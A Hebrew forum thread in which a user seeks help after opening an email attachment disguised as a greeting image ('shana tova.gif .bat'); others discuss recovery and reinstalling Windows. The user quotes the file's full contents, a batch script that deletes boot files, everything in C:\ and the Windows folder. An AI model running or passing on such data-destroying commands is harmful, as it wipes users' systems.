וירוס "שנה טובה"

nitsansh

New member
וירוס "שנה טובה"

קיבלתי "שנה טובה" בצורת קובץ מצורף בשם shanatova.gif המכיל וירוס שמוחק את קבצי האתחול AUTOEXEC.BAT ו-CONFIG.SYS. תוכן הקובץ: Content-Type: application/octet-stream; name="shana tova.gif .bat" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="shana tova.gif .bat" echo on cd c: del c:\autoexec.bat del c:\config.sys del c:\*.* del c:\windows\*.* אני "אכלתי אותה" ופתחתי את הקובץ... ואכן, הקבצים AUTOEXEC.BAT ו-CONFIG.SYS נמחקו מה-ROOT DIRECTORY של הדיסק. מצאתי קבצים בשם הנ"ל ב-C:\WINDOWS\COMMAND\EBD והעתקתי אותם ל-C:\. האם זה יעזור? אני מפחד שאני לא אוכל לאתחל את המחשב... מישהו מכיר את הוירוס הזה? מה אפשר לעשות?

nitsansh

New member
ועוד משהו...

בקובץ AUTOEXEC.BAT שמצאתי ב-EBD יש: @ECHO OFF set EXPAND=YES SET DIRCMD=/O:N set LglDrv=27 * 26 Z 25 Y 24 X 23 W 22 V 21 U 20 T 19 S 18 R 17 Q 16 P 15 set LglDrv=%LglDrv% O 14 N 13 M 12 L 11 K 10 J 9 I 8 H 7 G 6 F 5 E 4 D 3 C cls call setramd.bat %LglDrv% set temp=c:set tmp=c:path=%RAMD%:\;a:\;%CDROM%:copy command.com %RAMD%:\ > NUL set comspec=%RAMD%:\command.com copy extract.exe %RAMD%:\ > NUL copy readme.txt %RAMD%:\ > NUL :ERROR IF EXIST ebd.cab GOTO EXT echo Please insert Windows 98 Startup Disk 2 echo. pause GOTO ERROR :EXT %RAMD%:\extract /y /e /l %RAMD%: ebd.cab > NUL echo The diagnostic tools were successfully loaded to drive %RAMD%. echo. IF "%config%"=="NOCD" GOTO QUIT IF "%config%"=="HELP" GOTO HELP LH %ramd%:\MSCDEX.EXE /D:mscd001 /L:%CDROM% echo. GOTO QUIT :HELP cls call help.bat echo Your computer will now restart and the startup menu will appear. echo. echo. echo. echo. echo. echo. echo. echo. echo. echo. restart.com GOTO QUIT :QUIT echo To get help, type HELP and press ENTER. echo. rem clean up environment variables set CDROM= set LglDrv= יש לי ב-C:\ קובץ בשם AUTOEXEC.001 שיכול להיות עותק של AUTOEXEC.BAT המקורי... הוא נוצר בתאריך של התקנת WINDOWS, והקובץ למעלה הוא משנת 98... התוכן של ה-001 הוא: @ECHO OFF if not exist %winbootdir%\system\vmm32.o20 copy %winbootdir%\system\vmm32.vxd %winbootdir%\system\vmm32.o20 cd %winbootdir%\system devlib -u vmm32.vxd rplcldr %winbootdir%\system\vmm32\vmm.vxd %winbootdir%\system\vmm32.vxd devlib -p vmm32.vxd mode con codepage prepare=((862) C:\WINDOWS\COMMAND\hebega.cpi) mode con codepage select=862 האם אכן זה הקובץ הנכון? האם להעתיק אותו במקום הקובץ הקיים (זה שלמעלה)? האם אפשר לעשות את זה ב-WINDOWS?

מה שקרה הוא

שהפעלת קובץ ובו פקודות למחיקת תיקיית השורש של הדיסק, וכל תיקיית חלונות. במסגרת זו נמחקו גם קבצי autoexec ו config. לא ברור למה הם כתובים במפורש בשמם בנפרד שהרי יש שם כבר פקודה למחיקת כל הקבצים בתיקיית השורש. את המחשב ניתן לאתחל, אבל אין לך חלונות וגם הפקודות בקבצים שנמחקו נעלמו. קבצים אלו לא הבעיה, מה שחשוב יותר הוא שכל תיקיית חלונות נעלמה לך. במקרה זה מומלץ להתקין מחדש את חלונות ואח"כ את כל התוכנות שהיו מותקנות. הקבצים שהזכרת מתיקיית windows\command\ebd משמשים את דיסקט ההפעלה של חלונות, אותו start up diskette שמכינים כדי להפעיל בעזרתו את המחשב אם הוא לא עולה. כל הפקודות משם מיועדות לעבודה באותו דיסקט ולא לעבודה רגילה מהדיסק.

nitsansh

New member
רק הקבצים האלה נמחקו

למיטב הבנתי, כל יתר הקבצים חיים וקיימים... אחרת אני חושב שהמחשב לא היה פועל... והוא עובד מאז מוצ"ש ללא הפסקה... קיבלתי ממישהו את הקבצים החסרים והעתקתי אותם לדיסק... לפי מה שנאמר לי לא צריכה להיות בעיה לאתחל את המחשב...

למעלה